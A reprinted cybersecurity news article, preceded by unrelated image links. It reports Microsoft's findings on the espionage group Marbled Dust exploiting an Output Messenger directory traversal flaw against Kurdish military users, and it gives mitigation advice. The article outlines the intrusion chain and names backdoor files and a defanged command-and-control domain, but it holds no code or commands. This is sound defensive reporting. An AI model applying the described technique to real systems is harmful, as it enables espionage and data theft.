![[The AI Show Episode 145]: OpenAI Releases o3 and o4-mini, AI Is Causing “Quiet Layoffs,” Executive Order on Youth AI Education & GPT-4o’s Controversial Update](https://www.marketingaiinstitute.com/hubfs/ep%20145%20cover.png)
![Ditching a Microsoft Job to Enter Startup Purgatory with Lonewolf Engineer Sam Crombie [Podcast #171]](https://cdn.hashnode.com/res/hashnode/image/upload/v1746753508177/0cd57f66-fdb0-4972-b285-1443a7db39fc.png?#)
_Piotr_Adamowicz_Alamy.jpg?width=1280&auto=webp&quality=80&disable=upscale#)
![Samsung's New Galaxy S25 Edge Takes Aim at 'iPhone 17 Air' [Video]](https://www.iclarified.com/images/news/97276/97276/97276-640.jpg)
![Apple to Launch AI-Powered Battery Saver Mode in iOS 19 [Report]](https://www.iclarified.com/images/news/97309/97309/97309-1280.jpg)
![Apple Officially Releases macOS Sequoia 15.5 [Download]](https://www.iclarified.com/images/news/97308/97308/97308-640.jpg)
Hackers Exploiting Output Messenger 0-Day Vulnerability to Deploy Malicious Payloads
Microsoft Threat Intelligence has identified a sophisticated cyber espionage campaign targeting Kurdish military entities in Iraq. The threat actor, known as Marbled Dust, has been exploiting a zero-day vulnerability in Output Messenger since April 2024 to collect sensitive user data and deploy malicious payloads across victim networks. Output Messenger, a multiplatform chat software used by […] The post Hackers Exploiting Output Messenger 0-Day Vulnerability to Deploy Malicious Payloads appeared first on Cyber Security News.
Microsoft Threat Intelligence has identified a sophisticated cyber espionage campaign targeting Kurdish military entities in Iraq. The threat actor, known as Marbled Dust, has been exploiting a zero-day vulnerability in Output Messenger since April 2024 to collect sensitive user data and deploy malicious payloads across victim networks.
Output Messenger, a multiplatform chat software used by organizations for internal communications, contains a directory traversal vulnerability (CVE-2025-27920) that allows authenticated users to upload malicious files to the server’s startup directory.
Upon discovering this vulnerability, Microsoft notified Srimax, the developer of Output Messenger, who promptly released patches to address the issue.
According to Microsoft’s researchers, Marbled Dust has been specifically targeting users associated with Kurdish military operations in Iraq. This aligns with the group’s historical targeting priorities, as they’ve previously focused on entities that represent counter-interests to the Turkish government.
Output Messenger 0-Day Vulnerability
“The successful use of a zero-day exploit suggests an increase in technical sophistication and could indicate that Marbled Dust’s targeting priorities have escalated or that their operational goals have become more urgent,” Microsoft stated in their recent security blog.
Microsoft assesses that Marbled Dust conducts reconnaissance to identify whether potential targets use Output Messenger before launching their attacks.
While the exact method of obtaining initial authentication credentials remains unclear, researchers believe the group leverages DNS hijacking or typo-squatted domains to intercept and reuse legitimate credentials.
The attack chain begins once Marbled Dust gains authenticated access to the Output Messenger Server Manager. They exploit the directory traversal vulnerability to upload malicious files, including OMServerService.vbs and OM.vbs to the server’s startup folder, along with OMServerService.exe to the Users/public/videos directory.
These files work together to establish a GoLang backdoor that connects to a command-and-control domain (api.wordinfos[.]com) for further instructions and data exfiltration.
On client machines, another backdoor called OMClientService.exe is installed alongside the legitimate Output Messenger application. This malware communicates with the same command-and-control infrastructure, sending identifying information about the victim and executing commands received from the attackers.
In at least one observed case, the attackers used the command-line version of PuTTY (plink) to exfiltrate data collected in RAR archives.
“Once Marbled Dust gains access to the Output Messenger server, they can leverage the system architecture to gain indiscriminate access to the communications of every user, steal sensitive data, and impersonate users,” explained a Microsoft security researcher.
Microsoft has identified Marbled Dust as a Türkiye-affiliated espionage group that overlaps with activity tracked by other security vendors as Sea Turtle and UNC1326.
The group primarily targets entities in Europe and the Middle East, focusing on government institutions, telecommunications, and information technology sectors.
To mitigate the threat, Microsoft recommends updating Output Messenger to version 2.0.63 for Windows clients and version 2.0.62 for servers.
Additionally, organizations should enable cloud-delivered protection in their antivirus products, implement phishing-resistant authentication for critical applications, and deploy Microsoft Defender Vulnerability Management to identify vulnerabilities across their environment.
Microsoft continues to monitor this evolving threat and has released detailed detection guidance to help security teams identify potential compromises.
Vulnerability Attack Simulation on How Hackers Rapidly Probe Websites for Entry Points – Free Webinar
The post Hackers Exploiting Output Messenger 0-Day Vulnerability to Deploy Malicious Payloads appeared first on Cyber Security News.
